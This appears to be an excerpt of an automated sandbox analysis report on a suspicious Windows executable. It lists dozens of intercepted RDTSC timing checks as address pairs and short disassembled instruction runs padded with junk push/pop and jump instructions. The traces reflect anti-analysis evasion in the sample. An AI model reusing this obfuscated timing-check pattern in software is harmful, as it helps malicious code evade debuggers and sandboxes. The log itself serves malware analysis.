Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721159 second address: 16FB908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xor cx, 49B8h 0x0000000e call dword ptr [ebp+1244A2ECh] 0x00000014 pushad 0x00000015 jno 00007FEA75194B6Eh 0x0000001b jmp 00007FEA75194B54h 0x00000020 jns 00007FEA75194B52h 0x00000026 jmp 00007FEA75194B54h 0x0000002b popad 0x0000002c je 00007FEA75194B5Ch 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jg 00007FEA75194B46h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17216D7 second address: 1721765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEA75199F75h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FEA75199F74h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jmp 00007FEA75199F75h 0x00000027 jg 00007FEA75199F6Ch 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007FEA75199F76h 0x0000003a ja 00007FEA75199F66h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721765 second address: 172176B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721846 second address: 172184C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172184C second address: 1721865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007FEA75194B46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jg 00007FEA75194B67h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721865 second address: 1721869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218BC second address: 17218C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218C0 second address: 17218C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218C4 second address: 1721908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FEA75194B48h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push ecx 0x00000025 mov dword ptr [ebp+1244635Ch], ebx 0x0000002b pop edi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jno 00007FEA75194B4Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721908 second address: 1721912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721C5C second address: 1721C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA75194B46h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jbe 00007FEA75194B4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722087 second address: 172208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172208B second address: 17220A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17220A7 second address: 17220B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17223DA second address: 1722429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007FEA75194B46h 0x00000017 popad 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [eax] 0x0000001b jg 00007FEA75194B58h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FEA75194B51h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722503 second address: 1722513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722513 second address: 1722572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FEA75194B4Eh 0x0000000f jc 00007FEA75194B48h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FEA75194B48h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dh, DDh 0x00000032 mov edx, ecx 0x00000034 lea eax, dword ptr [ebp+12482EE7h] 0x0000003a mov edx, dword ptr [ebp+122D3831h] 0x00000040 nop 0x00000041 je 00007FEA75194B4Eh 0x00000047 jp 00007FEA75194B48h 0x0000004d push ebx 0x0000004e pop ebx 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 pop edi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722572 second address: 16FC43E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FEA75199F74h 0x0000000f pop ebx 0x00000010 popad 0x00000011 nop 0x00000012 call dword ptr [ebp+122D29DCh] 0x00000018 push edx 0x00000019 pushad 0x0000001a je 00007FEA75199F66h 0x00000020 jno 00007FEA75199F66h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A7DA second address: 175A7E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jp 00007FEA75194B46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A8FE second address: 175A906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A906 second address: 175A91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEA75194B46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FEA75194B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A91B second address: 175A924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A924 second address: 175A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175E90A second address: 175E922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F6Fh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1762082 second address: 17620BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEA75194B46h 0x0000000a jng 00007FEA75194B46h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FEA75194B59h 0x00000017 jmp 00007FEA75194B4Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17620BC second address: 17620C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17648D2 second address: 17648E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1768EF8 second address: 1768F23 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA75199F7Dh 0x00000008 jmp 00007FEA75199F75h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEA75199F6Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769066 second address: 1769093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FEA75194B63h 0x00000010 jmp 00007FEA75194B4Ah 0x00000015 jmp 00007FEA75194B53h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17691EF second address: 17691F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17691F5 second address: 1769201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769201 second address: 1769215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769215 second address: 1769231 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FEA75194B52h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769231 second address: 176923E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA75199F66h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17693C2 second address: 17693E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEA75194B46h 0x0000000a jmp 00007FEA75194B4Dh 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push edi 0x00000013 jnp 00007FEA75194B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17693E8 second address: 1769400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769400 second address: 176940B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 176940B second address: 1769421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA75199F66h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FEA75199F66h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771F9A second address: 1771FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FEA75194B46h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FAA second address: 1771FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FB0 second address: 1771FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FEA75194B46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FC0 second address: 1771FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FE1 second address: 1771FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177230E second address: 1772312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177245E second address: 1772462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772462 second address: 1772485 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA75199F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F6Eh 0x00000014 jbe 00007FEA75199F66h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772485 second address: 1772489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772489 second address: 177248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177248F second address: 1772494 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1773330 second address: 1773344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FEA75199F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1773344 second address: 1773349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177ADB1 second address: 177ADCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FEA75199F6Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f jns 00007FEA75199F66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1778F6C second address: 1778F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17790A9 second address: 17790C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17790C5 second address: 17790CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177940D second address: 1779413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779413 second address: 1779419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D0B second address: 1779D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEA75199F66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D1A second address: 1779D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D1E second address: 1779D24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D24 second address: 1779D29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177A83E second address: 177A848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177AB13 second address: 177AB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEA75194B4Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843C8 second address: 17843CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843CE second address: 17843D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843D6 second address: 17843EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 je 00007FEA75199F6Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843EB second address: 17843EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783B9C second address: 1783BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783BA4 second address: 1783BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jne 00007FEA75194B54h 0x0000000d jmp 00007FEA75194B54h 0x00000012 jmp 00007FEA75194B52h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D45 second address: 1783D62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Fh 0x00000007 jng 00007FEA75199F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D62 second address: 1783D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D66 second address: 1783D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D6A second address: 1783D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEA75194B4Ah 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D7F second address: 1783D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783F51 second address: 1783F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FEA75194B46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B6CE second address: 178B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B6D4 second address: 178B6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B59h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B881 second address: 178B8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F77h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BBAB second address: 178BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BEE5 second address: 178BEFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BEFA second address: 178BEFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5A7 second address: 178C5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5AD second address: 178C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5B1 second address: 178C5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1792DB9 second address: 1792DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA75194B48h 0x0000000a popad 0x0000000b jnl 00007FEA75194B7Eh 0x00000011 pushad 0x00000012 jmp 00007FEA75194B57h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1792DE6 second address: 1792DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
